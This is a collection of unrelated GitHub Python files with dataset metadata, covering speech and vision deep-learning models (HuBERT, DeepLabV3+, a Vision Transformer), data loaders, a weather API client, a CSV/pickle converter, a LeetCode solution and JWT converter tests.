ret_layer_results: bool = False,\n    ) -> Tuple[torch.Tensor, torch.Tensor]:\n        res = self.forward(\n            source,\n            padding_mask=padding_mask,\n            mask=mask,\n            features_only=True,\n            output_layer=output_layer,\n        )\n        feature = res[\"features\"] if ret_conv else res[\"x\"]\n        if ret_layer_results:\n            return (feature, res[\"layer_results\"]), res[\"padding_mask\"]\n        return feature, res[\"padding_mask\"]\n\n    def get_logits(self, net_output, is_masked=True):\n        if is_masked:\n            logits_list = net_output[\"logit_m_list\"]\n        else:\n            logits_list = net_output[\"logit_u_list\"]\n        logits_list = [x.float() for x in logits_list if x is not None]\n        return logits_list\n\n    def get_targets(self, net_output, is_masked=True):\n        logits_list = self.get_logits(net_output, is_masked)\n        targets_list = [\n            x.new_zeros(x.size(0), dtype=torch.long) for x in logits_list\n        ]\n        return targets_list\n\n    def get_extra_losses(self, net_output):\n        extra_losses = []\n        names = []\n\n        if \"features_pen\" in net_output:\n            extra_losses.append(net_output[\"features_pen\"])\n            names.append(\"features_pen\")\n\n        return extra_losses, names\n\n    def remove_pretraining_modules(self):\n        self.target_glu = None\n        self.final_proj = None\n        self.label_embs_concat = None\n","repo_name":"microsoft/UniSpeech","sub_path":"src/fairseq/models/hubert/ils_hubert.py","file_name":"ils_hubert.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":355,"dataset":"github-code","pt":"54"}
{"seq_id":"24186076536","text":"from torch.utils.data import Dataset\r\nimport torch\r\nimport numpy as np\r\nimport os\r\nfrom scipy.io import wavfile\r\nimport sounddevice as sd\r\n\r\nclass VoiceData(Dataset):\r\n\r\n    def __init__(self):\r\n\r\n        self.data_dir = './recordings/'\r\n        self.file_paths = [f for f in os.listdir(self.data_dir) if os.path.isfile(os.path.join(self.data_dir, f))]\r\n\r\n    def __len__(self):\r\n        return len(self.file_paths)\r\n\r\n    def __getitem__(self,idx):\r\n        fp = self.file_paths[idx]\r\n\r\n        # get y\r\n\r\n        y = int(fp[0])\r\n\r\n        # \r\n        self.fs, wv = wavfile.read(self.data_dir+fp)\r\n        assert self.fs==8000\r\n        wv = wv[:12000]\r\n        x=np.zeros((12000), dtype=np.float32)\r\n        x[:len(wv)] = wv\r\n        x = x/np.max(x)\r\n        x = torch.tensor(x, dtype=torch.float)\r\n        y = torch.tensor(y, dtype=torch.long)\r\n        return (x,y)\r\n    \r\n    \r\n    def play(self, idx):\r\n        x, y = self.__getitem__(idx)\r\n        sd.play(x, self.fs, blocking=True)\r\n        print(y)\r\n    \r\n\r\n","repo_name":"Eric-D-Stevens/multi_GPU_DataParallel_Tasks","sub_path":"voice_dataset.py","file_name":"voice_dataset.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
{"seq_id":"13419741647","text":"from dataset.dim_red_pca_operation import PcaDimRed\nfrom dataset.min_max_scaling_operation import MinMaxScaling\nfrom dataset.standard_scaling_operation import StandardScaling\nfrom dataset.biometric_dataset import BioDataSet\nfrom external_dataset_parsers import hmog_parser\n\n\"\"\"\nExample of feature generation from feature data for touch biometric data and performing feature scaling and feature \nreduction\n\"\"\"\n\n''' \n    Read the feature data from disk and generate features\n'''\n\nraw_bio_data = 'C:\\\\Users\\\\esi\\\\Documents\\\\WD\\\\data-sufficiency_uniqueness\\\\SecurityMetrics\\\\processed_data\\\\hmog_touch\\\\df_10.csv'\n\ntb_data = BioDataSet(feature_data_path=raw_bio_data)\n\n''' \n    Read the feature dataframe and generate features\n'''\n\nhmog_in = 
'C:\\\\wd\\\\research\\\\data-sufficiency_uniqueness\\\\SecurityMetrics\\\\raw_data\\\\hmog_dataset\\\\public_dataset'\ndf = hmog_parser.HMOGParser().raw_to_feature_vectors(hmog_in)\ntb_data = BioDataSet(feature_data_frame=df)\n\n''' \n get the user list from the dataset class object\n'''\n\nusers = tb_data.user_list\n\n''' \n generate tagged data set for each user\n'''\nData = dict()\nfor user in users:\n Data[user] = tb_data.get_data_set(user, neg_sample_sources=6, neg_test_limit=True)\n\n''' \n perform min max scaling and standard scaling\n'''\nmin_max_tuple = (0, 2)\nMinMaxData =dict()\nStandardScaleData = dict()\nfor user in Data:\n MinMaxData[user] = MinMaxScaling().operate(Data[user], min_max_tuple)\n StandardScaleData[user] = StandardScaling().operate(Data[users])\n\n''' \n perform dataset dimension reduction\n'''\n\nred_data = dict()\nfor us in Data:\n red_data[us] = PcaDimRed().operate(Data[us], n_components=13)\n","repo_name":"sohailhabib/SecurityMetrics","sub_path":"source_code/examples/dataset_preprocessing_usage.py","file_name":"dataset_preprocessing_usage.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34383971508","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n p = TreeNode(0)\n stack = []\n while True:\n while root != None:\n root.left, root.right = root.right, root.left\n p.right = root\n p = p.right\n stack.append(root)\n root = root.right\n if stack == []:\n return\n q = stack.pop()\n root = q.left\n q.left = None\n","repo_name":"TJZ1990/leetcode","sub_path":"Python/114-Flatten Binary Tree to Linked List-V1.py","file_name":"114-Flatten Binary Tree to Linked List-V1.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34940855244","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom backbone import resnet\n\n\nclass DepthwiseSeparableConv2d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1, bias=False):\n super(DepthwiseSeparableConv2d, self).__init__()\n self.depthwise_conv = nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=stride, padding=padding, dilation=dilation, groups=in_channels, bias=bias)\n self.depthwise_bn = nn.BatchNorm2d(in_channels)\n self.depthwise_activate = nn.ReLU()\n self.pointwise_conv = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1, bias=bias)\n self.pointwise_bn = nn.BatchNorm2d(out_channels)\n self.pointwise_activate = nn.ReLU()\n\n '''forward'''\n def forward(self, x):\n x = self.depthwise_conv(x)\n if hasattr(self, 'depthwise_bn'): x = self.depthwise_bn(x)\n if hasattr(self, 'depthwise_activate'): x = self.depthwise_activate(x)\n x = self.pointwise_conv(x)\n if hasattr(self, 'pointwise_bn'): x = self.pointwise_bn(x)\n if hasattr(self, 'pointwise_activate'): x = self.pointwise_activate(x)\n return x\n\n\nclass DepwiseSeparableASPP(nn.Module):\n def __init__(self, in_channels, out_channels, dilations, **kwargs):\n super(DepwiseSeparableASPP, self).__init__()\n self.parallel_branches = nn.ModuleList()\n for idx, dilation in 
enumerate(dilations):\n if dilation == 1:\n branch = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=dilation, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n else:\n branch = DepthwiseSeparableConv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=dilation, dilation=dilation, bias=False)\n self.parallel_branches.append(branch)\n self.global_branch = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n self.bottleneck = nn.Sequential(\n nn.Conv2d(out_channels * (len(dilations) + 1), out_channels, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n def forward(self, x):\n size = x.size()\n outputs = []\n for branch in self.parallel_branches:\n outputs.append(branch(x))\n global_features = self.global_branch(x)\n global_features = F.interpolate(global_features, size=(size[2], size[3]), mode='bilinear',\n align_corners=False)\n outputs.append(global_features)\n features = torch.cat(outputs, dim=1)\n features = self.bottleneck(features)\n return features\n\n\nclass DeeplabV3Plus(nn.Module):\n def __init__(self, config, mode=\"train\", pretrain_base=False):\n super(DeeplabV3Plus, self).__init__()\n self.config = config\n self.mode = mode\n assert self.mode.upper() in ['TRAIN', 'TEST']\n self.backbone = resnet.__dict__[config.deeplab.backbone](pretrained=pretrain_base, outstride=self.config.deeplab.outstride)\n aspp_config = {\n 'in_channels': config.deeplab.aspp[\"in_channels\"],\n 'out_channels': config.deeplab.aspp[\"out_channels\"],\n 'dilations': config.deeplab.aspp[\"dilations\"],\n }\n self.aspp_net = DepwiseSeparableASPP(**aspp_config)\n shortcut_config = config.deeplab.shortcut\n self.shortcut = nn.Sequential(\n nn.Conv2d(shortcut_config['in_channels'], shortcut_config['out_channels'], kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(shortcut_config['out_channels']),\n nn.ReLU()\n )\n decoder_cfg = config.deeplab.decoder\n self.decoder = nn.Sequential(\n DepthwiseSeparableConv2d(decoder_cfg['in_channels'], decoder_cfg['out_channels'], kernel_size=3, stride=1, padding=1, bias=False),\n DepthwiseSeparableConv2d(decoder_cfg['out_channels'], decoder_cfg['out_channels'], kernel_size=3, stride=1, padding=1, bias=False),\n nn.Dropout2d(decoder_cfg['dropout']),\n nn.Conv2d(decoder_cfg['out_channels'], config.data.num_classes, kernel_size=1, stride=1, padding=0)\n )\n\n def load_backbone_checkpoint(self, state_dict, strict=True):\n self.backbone.load_state_dict(state_dict, strict=strict)\n\n def forward(self, x):\n img_size = x.size(2), x.size(3)\n # feed to backbone network\n backbone_outputs = self.backbone(x)\n # feed to aspp\n aspp_out = self.aspp_net(backbone_outputs[-1])\n aspp_out = F.interpolate(aspp_out, size=backbone_outputs[0].shape[2:], mode='bilinear',\n align_corners=True)\n # feed to shortcut\n shortcut_out = self.shortcut(backbone_outputs[0])\n # feed to decoder\n feats = torch.cat([aspp_out, shortcut_out], dim=1)\n predictions = self.decoder(feats)\n predictions = F.interpolate(predictions, size=img_size, mode='bilinear', align_corners=True)\n return 
predictions","repo_name":"pUmpKin-Co/offical-IndexNet","sub_path":"deeplabv3plus/deeplabc3_plus.py","file_name":"deeplabc3_plus.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"5354274300","text":"import csv\r\nimport pickle\r\n\r\nprint(\"\"\"Would you like to:\r\n1 - Convert .csv to .dab\r\n2 - Convert .dab to .csv\"\"\")\r\nchoice = input(\">\")\r\nprint()\r\n\r\nif choice == \"1\":\r\n file = input(\"What csv file would you like to read?\\n>\")\r\n file += \".csv\"\r\n name = input(\"What would you like to call your file?\\n>\")\r\n name += \".dab\"\r\n\r\n with open(file) as csvf:\r\n a = csv.reader(csvf)\r\n b = [i for i in a if i != []]\r\n out_file = open(name,\"wb\")\r\n pickle.dump(b, out_file)\r\n print(\"dumped:\\n\" + str(b))\r\n out_file.close()\r\nelif choice == \"2\":\r\n file = input(\"What dab file would you like to read?\\n>\")\r\n file += \".dab\"\r\n name = input(\"What would you like to call your file?\\n>\")\r\n name += \".csv\"\r\n\r\n in_file = open(file, \"rb\")\r\n data = pickle.load(in_file)\r\n new_data = [i for i in data if i != []]\r\n in_file.close\r\n\r\n with open(name, 'w') as csvf:\r\n writer = csv.writer(csvf)\r\n for row in data: \r\n writer.writerow(row)\r\n print(\"added:\", row)\r\nelse:\r\n print(\"Invalid Choice\")\r\n \r\nenter = input(\"Press Enter to Continue...\")\r\n","repo_name":"talcosaurusrex/vocab-depressed","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7671456313","text":"import requests\nfrom requests.exceptions import HTTPError\nimport time\nimport os\nimport json\nfrom googletrans import Translator\nimport numpu\nclass OpenWeatherApi:\n\n __APPID = \"b6731c567cf35bb7de231f7ccaab085c\"\n __timers = {'forecast': 60 * 60 * 2,\n 'weather': 60 * 10\n }\n\n def __init__(self, connection=True):\n self.translator = Translator()\n\n def _dump(self, data, data_name, city):\n with open('{0}_fixture_{1}_time.txt'.format(data_name, city), 'w') as f:\n print(time.time())\n f.write(str(time.time()))\n with open('{0}_fixture_{1}.txt'.format(data_name, city), 'w') as f:\n json.dump(data, f)\n\n def _load_data(self, data_name, city) -> dict:\n with open('{0}_fixture_{1}.txt'.format(data_name, city), 'r') as f:\n return json.load(f)\n\n def _load_time(self, data_name, city):\n with open('{0}_fixture_{1}_time.txt'.format(data_name, city), 'r') as f:\n return float(f.read())\n\n def get_raw_data(self, data_name, city) -> dict:\n file_path = './{0}_fixture_{1}.txt'.format(data_name, city)\n if os.path.exists(file_path):\n t = self._load_time(data_name, city)\n if time.time() - t < self.__timers[data_name]:\n return self._load_data(data_name, city)\n\n url = \"http://api.openweathermap.org/data/2.5/{0}\".format(data_name)\n response = requests.get(url, params={'q': city, 'lang': 'ru', 'units': 'metric', 'APPID': self.__APPID})\n try:\n response.raise_for_status()\n except HTTPError as http_err:\n print(f'HTTP error occurred: {http_err}')\n return None\n except Exception as err:\n print(f'Other error occurred: {err}')\n return None\n else:\n data = response.json()\n self._dump(data, data_name, city)\n return response.json()\n\n def get_weather(self, city):\n data = self.get_raw_data('weather', self.translator.translate(city, dest='en').text)\n if data == None:\n return 'Got problems on server'\n 
answer = 'Погода в {0}\\n' \\\n 'Температура {1} С°\\n' \\\n 'Ощущается как {2} С°\\n' \\\n 'Относительная влажность {3}%\\n' \\\n 'Скорость ветра {4} м/c\\n' \\\n '{5}\\n'.format(data['name'],\n data['main']['temp'],\n data['main']['feels_like'],\n data['main']['humidity'],\n data['wind']['speed'],\n data['weather'][0]['description'].capitalize()\n )\n return answer\n\n def get_forecast(self, city):\n data = self.get_raw_data('forecast', self.translator.translate(city, dest='en').text)\n if data == None:\n return 'Got problems on server'\n n = 3\n answer = 'Прогноз погоды в {0} на ближайшие несколько часов:'.format(data['city']['name'], n * 3)\n for i in range(1, n+1):\n dl = data['list'][i]\n answer += '\\nОжидается на {0}:\\n' \\\n 'Температура {1} С°\\n' \\\n 'Ощущается как {2} С°\\n' \\\n 'Относительная влажность {3}%\\n' \\\n 'Скорость ветра {4} м/c\\n' \\\n '{5}\\n'.format(dl['dt_txt'],\n dl['main']['temp'],\n dl['main']['feels_like'],\n dl['main']['humidity'],\n dl['wind']['speed'],\n dl['weather'][0]['description'].capitalize()\n )\n return answer\n\n##################################################################################\n\ndef main():\n weather_api = OpenWeatherApi()\n print(weather_api.get_weather('Moscow'))\n print(weather_api.get_forecast('Moscow'))\n\nif __name__ == '__main__':\n main()\n","repo_name":"captainum/WeatherApi","sub_path":"city.py","file_name":"city.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19817333680","text":"from datetime import datetime, timedelta\n\nimport pytest\nfrom jose import jwt, JWTError\n\nfrom src.config import SecuritySetting\nfrom src.schemas.users import User\nfrom src.security.JwtConverter import JwtConverter\n\nexp_time = timedelta(minutes=15)\ntest_secret = \"yqWlVAiIgqm1nqc5SEa1aM7C6lJ8JTrZ\"\n\n\n@pytest.fixture\ndef get_jwt():\n claims = {\n \"iss\": \"ska_checklist\",\n \"iat\": datetime.utcnow(),\n \"exp\": datetime.utcnow() + exp_time,\n \"username\": \"test_user\",\n \"is_superuser\": \"true\"\n }\n return jwt.encode(claims=claims, key=test_secret)\n\n@pytest.fixture\ndef get_exp_jwt():\n claims = {\n \"iss\": \"ska_checklist\",\n \"iat\": datetime.utcnow() - timedelta(minutes=16),\n \"exp\": datetime.utcnow() - timedelta(minutes=1),\n \"username\": \"test_user\",\n \"is_superuser\": \"true\"\n }\n return jwt.encode(claims=claims, key=test_secret)\n@pytest.fixture\ndef get_dummy_config():\n return SecuritySetting(jwt_secret=test_secret)\n\n@pytest.fixture\ndef get_user() -> User:\n return User(id=1,\n is_superuser = True,\n created_at = datetime.utcnow(),\n username=\"test_user\",\n name=\"John\",\n surname=\"Doe\",\n )\n\n@pytest.fixture\ndef converter(get_dummy_config, get_dummy_dao) -> JwtConverter:\n return JwtConverter(userdao=get_dummy_dao, config=get_dummy_config)\n\n\ndef test_exchange_jwt_to_user(get_jwt, converter: JwtConverter):\n user: User = converter.get_user(get_jwt)\n\n assert user.username == \"test_user\"\n assert user.name == \"John\"\n\ndef test_expired_jwt(get_exp_jwt, converter: JwtConverter):\n with pytest.raises(JWTError):\n user: User = converter.get_user(get_exp_jwt)\n\ndef test_wrong_jwt_signature(converter):\n with pytest.raises(JWTError):\n user: User = converter.get_user(\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c\")\n\ndef test_exchange_user_to_jwt(get_user, converter):\n 
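# round-trip check: encode the User fixture, then decode with the shared test secret\n    # and verify that the custom claims survive\n    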
token = converter.get_jwt(get_user)\n\n    decoded = jwt.decode(token=token, key=test_secret)\n\n    assert decoded.get(\"username\") == \"test_user\"\n    assert decoded.get(\"is_superuser\") == True","repo_name":"atlomak/check_list","sub_path":"tests/security/test_jwtConverter.py","file_name":"test_jwtConverter.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"6540991878","text":"import torch\nimport torch.nn as nn\n\n# https://www.youtube.com/watch?v=ovB0ddFtzzA&t=876s\n\nclass patchembed(nn.Module):\n    \"\"\" Split the input image into patches and embed each patch.\n    \n    Parameters\n    ---------\n    img_size : int\n        Size of the (square) input image;\n        used internally as (img_size, img_size)\n    \n    patch_size : int\n        Side length of each square patch;\n        used internally as (patch_size, patch_size)\n    \n    int_chans : int\n        Number of input image channels\n    \n    embed_dim : int\n        Embedding dimension\n\n    \"\"\"\n    def __init__(self,img_size,patch_size,int_chans=3,embed_dim=768) -> None:\n        super().__init__()\n        self.img_size = img_size\n        self.patch_size = patch_size\n        \n        ## number of patches\n        self.n_patches = (img_size // patch_size)**2\n\n        self.proj = nn.Conv2d(int_chans,embed_dim,kernel_size=patch_size,stride=patch_size)\n        \n    def forward(self,x):\n        \"\"\" Forward pass.\n        \n        Parameters\n        -----------\n        x : torch.Tensor\n            Shape '(batch, channels, img_size, img_size)'\n        \n        Returns\n        -------\n        torch.tensor\n            Shape '(batch, n_patches, embed_dim)'\n        \n        \"\"\"\n        \n        x = self.proj(x)\n        x = x.flatten(2) # (batch, embed_dim, n_patches)\n        x = x.transpose(1,2) # (batch, n_patches, embed_dim)\n        return x\n    \n    \nclass Attention(nn.Module):\n    \"\"\" Attention mechanism.\n    Parameters\n    ----------\n    dim : int\n        Input dimension\n    \n    n_heads : int\n        Number of attention heads\n\n    qkv_bias : bool\n        Whether the query, key and value projections use a bias term\n    \n    attn_p : float\n        Dropout probability for the attention weights (query, key, value)\n    \n    proj_p : float\n        Dropout probability for the output tensor \n    \n    \n    Attributes\n    ----------\n    scale : float\n        Normalizing factor for the attention scores \n    qkv : nn.Linear\n        Combined query, key and value projection\n    \n    proj : nn.Linear\n        Dense layer applied to the concatenated attention outputs\n    \n    attn_drop, proj_drop : nn.Dropout\n        Dropout layers \n    \"\"\"\n    \n    def __init__(self,dim,n_heads=12,qkv_bias=True,attn_p=0.,proj_p=0.) -> None:\n        super().__init__()\n        self.n_heads = n_heads\n        self.dim = dim\n        self.head_dim = dim // n_heads # the encoder dimension is split evenly across the n_heads attention heads
\n        self.scale = self.head_dim ** -0.5 ## attention score scaling factor\n        \n        \n        \n        self.query = nn.Linear(dim, dim)\n        self.key = nn.Linear(dim, dim)\n        self.value = nn.Linear(dim, dim)\n        \n        \n        \n        self.qkv = nn.Linear(dim,dim*3,bias=qkv_bias)\n        self.attn_drop = nn.Dropout(attn_p)\n        self.proj = nn.Linear(dim,dim) ## multi-head attention keeps the input and output dimensions equal\n        self.proj_drop = nn.Dropout(proj_p)\n        \n    def forward(self,x):\n        \"\"\" Forward pass (multi-head attention keeps the input and output dimensions equal).\n        \n        Parameters\n        ----------\n        x : torch.Tensor\n            Shape '(batch, n_patches + 1, dim)';\n            the +1 is the class token prepended to the patch tokens\n        \n        Returns\n        -------\n        torch.Tensor\n            Shape '(batch, n_patches + 1, dim)'\n        \n        \"\"\"\n        # see the figure at https://paperswithcode.com/method/multi-head-attention\n        \n        \n        ## batch size, token count, dimension of x\n        ## each embedded patch can be treated as a single token\n        n_samples, n_tokens, dim = x.shape\n        \n        \n        ## multi-head self-attention needs matching input and output dimensions; anything else is an error \n        if dim != self.dim:\n            raise ValueError\n        \n\n        \n        \n        ################ to be removed\n        # q = self.query(x)\n        # # q = torch.Size([512, 65, 128]) \n        # q = q.view(batch_size, -1, self.n_heads, self.head_dim).permute(0,2,1,3)\n        # # q = torch.Size([512, 8, 65, 16])\n        ################\n        \n        \n\n\n        ## compute q, k and v in a single projection \n        qkv = self.qkv(x) # input: (batch, n_patches + 1, embed_dim), output: (batch, n_patches + 1, 3 * embed_dim)\n        # qkv = torch.Size([512, 65, 384])\n        \n        # reshape the fused projection\n        ## -> split query, key and value across the heads\n        qkv = qkv.reshape(n_samples,n_tokens,3,self.n_heads,self.head_dim) # (batch, n_patches + 1, 3, n_heads, head_dim)\n        ## permute so each head is easy to index\n        ## move the 3 (q/k/v) axis to the front...\n        qkv = qkv.permute(2,0,3,1,4) # (3, batch, n_heads, n_patches + 1, head_dim) \n        \n        \n        ## unpack query, key and value\n        q,k,v = qkv[0],qkv[1],qkv[2]\n        # q= torch.Size([512, 8, 65, 16])\n        # batch, n_heads, n_patches, head_dim\n        \n        \n        ## transpose of the key matrix\n        k_t = k.transpose(-2,-1) # (batch, n_heads, head_dim, n_patches + 1)\n        # k_t = torch.Size([512, 8, 16, 65])\n        # k = torch.Size([512, 8, 65, 16])\n        \n        \n        \n        ## multiply the query and key matrices and rescale\n        dp = (q@k_t) * self.scale # (batch, n_heads, n_patches + 1, n_patches + 1)\n        ## build the attention map (softmax & dropout)\n        # dp = torch.Size([512, 8, 65, 65])\n        attn = dp.softmax(dim=-1)\n        attn = self.attn_drop(attn)\n        \n        \n        \n        ## weight v by the attention scores\n        # weighted_avg = torch.Size([512, 8, 65, 16])\n        weighted_avg = attn @ v # (batch, n_heads, n_patches + 1, head_dim)\n        \n        # weighted_avg = torch.Size([512, 65, 8, 16])\n        weighted_avg = weighted_avg.transpose(1,2) # (batch, n_patches + 1, n_heads, head_dim)\n        \n        ## flatten the per-head outputs into one vector -> this is also the concat step\n        weighted_avg = weighted_avg.flatten(2) # (batch, n_patches + 1, n_heads * head_dim) => (batch, n_patches + 1, embed_dim)\n        # weighted_avg = torch.Size([512, 65, 128])\n        \n        x = self.proj(weighted_avg)\n        x = self.proj_drop(x)\n        \n        \n        return x,q,k,v\n    \nclass MLP(nn.Module):\n    \"\"\" Multi-layer perceptron.\n    \n    Parameters\n    ----------\n    in_features: int\n        Input size\n    \n    hidden_feactures : int\n        Hidden layer size\n    \n    out_feactures : int\n        Output size\n    \n    p : float\n        Dropout probability\n    \n    \"\"\"\n    def __init__(self,in_features,hidden_feactures,out_feactures,p=0.):\n        super().__init__()\n        self.fc1 = nn.Linear(in_features,hidden_feactures)\n        self.act = nn.GELU()\n        self.fc2 = nn.Linear(hidden_feactures,out_feactures)\n        self.drop = nn.Dropout(p)\n    \n    def forward(self,x):\n        x = self.fc1(x)\n        x = self.act(x)\n        x = self.fc2(x)\n        x = self.drop(x)\n        \n        return x\n    \n    \n    \nclass Block(nn.Module):\n    \"\"\" Transformer block.\n    \n    Parameters\n    ----------\n    dim : int\n        Embedding dimension\n    \n    n_heads : int\n        Number of attention heads\n    \n    mlp_ratio : float\n        Determines the hidden size of the 'MLP' module relative to 'dim'\n    \n    qkv_bias : bool\n        Whether the query, key and value projections use a bias term\n    \n    p, attn_p : float\n        Dropout probabilities\n    \n    \n    \"\"\"\n    def __init__(self,dim,n_heads,mlp_ratio=4.0,qkv_bias=True,p=0,attn_p=0):\n        super().__init__()\n        self.norm1 = nn.LayerNorm(dim, eps=1e-6)\n        self.attn = 
Attention(dim,n_heads=n_heads,qkv_bias=qkv_bias,attn_p=attn_p,proj_p=p)\n        self.norm2 = nn.LayerNorm(dim,eps=1e-6)\n        \n        ## the MLP hidden dimension is 4x the transformer output dimension \n        hidden_feactures = int(dim*mlp_ratio)\n        self.mlp = MLP(\n            in_features=dim,\n            hidden_feactures=hidden_feactures,\n            out_feactures=dim,\n        )\n        \n    def forward(self,x):\n        z,q,k,v = self.attn(self.norm1(x))\n        x = x + z\n        x = x + self.mlp(self.norm2(x))\n        \n        return x , q,k,v\n    \n    \nclass Vit(nn.Module):\n    def __init__(self,\n                 img_size=256,\n                 patch_size=16,\n                 in_chans=3,\n                 n_classes=1000,\n                 depth=1,\n                 embed_dim=768,\n                 n_heads=12,\n                 mlp_ratio=4.,\n                 qkv_bias=False,\n                 p=0.,\n                 attn_p=0., \n                 ):\n        super().__init__()\n        \n        self.patch_embed = patchembed(\n            img_size=img_size,\n            patch_size=patch_size,\n            int_chans=in_chans,\n            embed_dim=embed_dim\n        )\n        \n        ## class token prepended to the embedded patch sequence\n        self.cls_token = nn.Parameter(torch.zeros(1,1,embed_dim))\n        \n        ## positional embedding parameters\n        self.pos_embed = nn.Parameter(torch.zeros(1,1+self.patch_embed.n_patches,embed_dim))\n        \n        self.pos_drop = nn.Dropout(p=p)\n        \n        self.blocks = nn.ModuleList(\n            [\n                Block(\n                    dim = embed_dim,\n                    n_heads=n_heads,\n                    mlp_ratio=mlp_ratio,\n                    qkv_bias=qkv_bias,\n                    p=p,\n                    attn_p=attn_p, \n                )\n                for _ in range(depth)\n            ]\n        )\n        \n        self.norm = nn.LayerNorm(embed_dim,eps=1e-6)\n        self.head = nn.Linear(embed_dim,n_classes)\n        \n    def forward(self,x):\n        ## batch size\n        n_samples = x.shape[0]\n        x = self.patch_embed(x)\n        \n        cls_token = self.cls_token.expand(n_samples,-1,-1) # (batch, 1, embed_dim)\n        \n        ## prepend the cls token\n        x = torch.cat((cls_token,x),dim=1)\n        \n        x = x + self.pos_embed # (batch, 1 + n_patches, embed_dim)\n        x = self.pos_drop(x)\n        \n        for block in self.blocks:\n            x,q,k,v = block(x) \n            # x = block(x)\n        \n        x = self.norm(x)\n        \n        cls_token_final = x[:,0] # final ViT output taken at the class token\n        x = self.head(cls_token_final)\n        \n        return x ,q,k,v\n    \n    ## data loader\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch\nfrom torch.utils.data import DataLoader\n\nimg_size = 32\nbatch_size = 512\n\nmean = (0.4914, 0.4822, 0.4465)\nstd = (0.2023, 0.1994, 0.2010)\ntrain_transform = transforms.Compose([transforms.Resize(img_size), transforms.RandomCrop(img_size, padding=2),\n                                      transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize(mean, std)])\ntest_transform = transforms.Compose([transforms.Resize(img_size), transforms.ToTensor(),\n                                     transforms.Normalize(mean, std)])\n\ntrainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=train_transform)\nvalset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=test_transform)\n\n\ntrainloader = DataLoader(trainset, batch_size=batch_size)\nvalloader = DataLoader(valset, batch_size=batch_size, shuffle=False)\n\n# model definition\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel = Vit(img_size=img_size,patch_size=4,in_chans=3,n_classes=10,embed_dim=128,n_heads=8,depth=1)\n\n# model = Vit(img_size=img_size,patch_size=4,in_chans=3,n_classes=10)\n\nmodel.to(device)\n\n# training\nimport torch.optim as optim\nepochs = 100\nlr = 0.001\nweight_decay = 0\n\ninterver=40\n\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\nfor epoch in range(0,epochs):\n    \n    \n    model.train()\n    \n    running_loss = 0\n    total_correct = 0\n    for i,(img,target) in enumerate(trainloader):\n        optimizer.zero_grad() # reset the model gradients to zero\n        \n        outputs , q,k,v = model(img.to(device))\n        \n        \n        loss = criterion(outputs, target.to(device))\n        loss.backward() # call backward to compute the gradients
\n        optimizer.step() # update the model's learnable parameters\n        \n        running_loss += loss.item() / len(trainloader)\n        \n        _, predicted = torch.max(outputs, 1)\n        correct = (predicted == target.to(device)).sum().item() \n        total_correct += correct\n        \n        if i % interver ==0:\n            # print(f'[{epoch}\\t{len(trainloader)}/{i}]\\t loss : {loss:.4f} \\t accuracy : {correct/batch_size*100:.2f}% \\t{correct}/{batch_size}') \n            pass\n\n    # print(f\"{epoch} epoch avg\\tloss : {running_loss} \\t accuracy : {total_correct/(batch_size*len(trainloader))*100:.2f}% \\t {total_correct}/{batch_size*len(trainloader)}\")\n    # print(\"\\n\")\n    \n","repo_name":"kwon-jaehong/pytorch_vit","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":13286,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
